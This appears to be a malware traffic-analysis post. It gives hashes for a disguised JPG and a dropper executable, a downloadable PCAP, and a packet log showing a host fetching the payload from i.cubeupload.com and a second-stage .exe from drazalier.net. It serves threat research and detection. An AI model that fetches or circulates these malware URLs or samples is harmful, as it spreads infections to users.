Malware Trojan Downloader Dropper cubeupload.com PCAP file download traffic analysis

Download Attachments

  • 1 pcap icube
    Date added: September 25, 2017 11:46 pm Added by: admin File size: 31 KB Downloads: 56

 

 

43 engines detected this file
SHA-256 b069e7d29889bcdcc61e7936ad4800d2563c8618135f40c50e4dbcdc9314f505
File name gfD4vo.jpg
File size 522.61 KB
Last analysis 2017-09-25 22:14:16 UTC

 

FILE 2 – Dropper

 

23 engines detected this file
SHA-256 214325a508b6354286f0ba47afdf998ea8c5b87012d6fac08ec0e7a996ac1999
File name 2602033098198832.exe
File size 266.49 KB
Last analysis 2017-09-25 22:34:21 UTC
Community score -11

 

2017-09-25 16:39:29.774994 IP 192.168.1.102.61160 > 75.75.75.75.53: 16676+ A? i.cubeupload.com. (34)
E..>…….2…fKKKK…5.*z.A$………..i
cubeupload.com…..
2017-09-25 16:39:29.812702 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [S], seq 1274466961, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….|…f..sl…PK……… ……………..
2017-09-25 16:39:29.934339 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [.], ack 217614345, win 256, length 0
E..(..@……..f..sl…PK…… P….b……..
2017-09-25 16:39:30.010343 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [P.], seq 0:489, ack 1, win 256, length 489: HTTP: GET /gfD4vo.jpg HTTP/1.1
E…..@…}….f..sl…PK…… P…….GET /gfD4vo.jpg HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: i.cubeupload.com
Connection: Keep-Alive

2017-09-25 16:39:30.748418 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [P.], seq 0:139, ack 1, win 256, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
E…T+@…r….f.#.@…P..i|.\.wP…D^..GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

 

2017-09-25 16:39:30.893843 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [.], ack 1219, win 251, length 0
E..(T,@…s1…f.#.@…P..j..\.9P………….
2017-09-25 16:39:30.924425 IP 192.168.1.102.61163 > 75.75.75.75.53: 19539+ A? isrg.trustid.ocsp.identrust.com. (49)
E..M……. …fKKKK…5.9.ZLS………..isrg.trustid.ocsp identrust.com…..
2017-09-25 16:39:30.942900 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [S], seq 1854319918, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4u.@…Q5…f.#…..Pn……… . ……………
2017-09-25 16:39:31.041398 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [.], ack 2211464567, win 256, length 0
E..(u.@…Q@…f.#…..Pn../..EwP….u……..
2017-09-25 16:39:31.042271 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [P.], seq 0:247, ack 1, win 256, length 247: HTTP: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1
E…u.@…PH…f.#…..Pn../..EwP…….GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: isrg.trustid.ocsp.identrust.com

2017-09-25 16:39:31.187180 IP 192.168.1.102.61164 > 75.75.75.75.53: 10447+ A? ocsp.int-x3.letsencrypt.org. (45)
E..I…….#…fKKKK…5.5..(…………ocsp.int-x3.letsencrypt.org…..
2017-09-25 16:39:31.277686 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [P.], seq 295:812, ack 3052, win 256, length 517
E..-..@…}x…f..sl…..(….dJP….&………..c]..c!.=.AW….cb?.c.R.a…..&..(J$.k.q>?….N!D….w#…X.z.Hy.G..0.AH..”T$~9^..t…[.2…u)”…………U…h…..{.+.d……G.Z{..I\…….8…..{..+%g..).I…O..’…+*.5N.[C>..#…0c….I.y.T~!xy*….p7..1….*
._.X#…..t.o…a…-.i…a..).G…j…zm….4..9…..6…G<s.wX….EOx.x.h.G.{…..>.#q..K…..[.y…D….X…U….K*.’+..D…4…..r=L…..fw..y$i] ..7X….]..\.!.o..<..-fXW…~2..\….&…F..B.$_…\Q.]…..`+..#.:S*..g.5*..>…V…Q{…..S.{|.O…s..6]……].h…….G..%[3..8.+.6r~C.>|.v
2017-09-25 16:39:31.393111 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 5972, win 256, length 0
E..(..@….|…f..sl…..(….o.P………….
2017-09-25 16:39:31.394922 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 8892, win 256, length 0
E..(..@….{…f..sl…..(….{.P….Q……..
2017-09-25 16:39:31.395511 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 11812, win 256, length 0
E..(..@….z…f..sl…..(……P………….
2017-09-25 16:39:31.396583 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 14732, win 256, length 0
E..(..@….y…f..sl…..(……P………….
2017-09-25 16:39:31.397200 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 17652, win 256, length 0
E..(..@….x…f..sl…..(…..RP………….
2017-09-25 16:39:31.508500 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 20572, win 256, length 0
E..(..@….w…f..sl…..(……P…|………
2017-09-25 16:39:31.509234 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 23492, win 256, length 0
E..(..@….v…f..sl…..(…..”P…qI……..

2017-09-25 16:39:48.032574 IP 192.168.1.102.61165 > 75.75.75.75.53: 52627+ A? drazalier.net. (31)
E..;…….0…fKKKK…5.’.^………… drazalier.net…..
2017-09-25 16:39:48.181862 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [S], seq 436295889, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..45.@…^….f>.e&…P..X……. ……………..
2017-09-25 16:39:48.293504 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [.], ack 3080210756, win 256, length 0
E..(5.@…_ …f>.e&…P..X…IDP………….
2017-09-25 16:39:48.300187 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [P.], seq 0:499, ack 1, win 256, length 499: HTTP: GET /PO/2602033098198832.exe HTTP/1.1
E…5.@…]….f>.e&…P..X…IDP…….GET /PO/2602033098198832.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: drazalier.net
Connection: Keep-Alive

 

Share

Leave a Reply